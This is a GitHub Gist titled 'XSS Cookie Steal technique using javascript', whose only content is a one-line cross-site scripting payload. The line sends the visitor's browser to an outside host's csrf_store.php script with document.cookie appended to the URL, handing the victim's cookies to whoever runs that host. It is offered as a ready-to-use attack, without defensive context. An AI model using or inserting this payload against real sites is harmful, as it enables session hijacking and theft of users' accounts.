Skip to content

Instantly share code, notes, and snippets.

@dino213dz
Created August 17, 2019 15:24
Show Gist options
  • Save dino213dz/79bd57a47210d6ac23f055a45fb09246 to your computer and use it in GitHub Desktop.
Save dino213dz/79bd57a47210d6ac23f055a45fb09246 to your computer and use it in GitHub Desktop.
XSS Cookie Steal technique using javascript
document.location="http://site.me/csrf_store.php?doc_cookies="+document.cookie;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment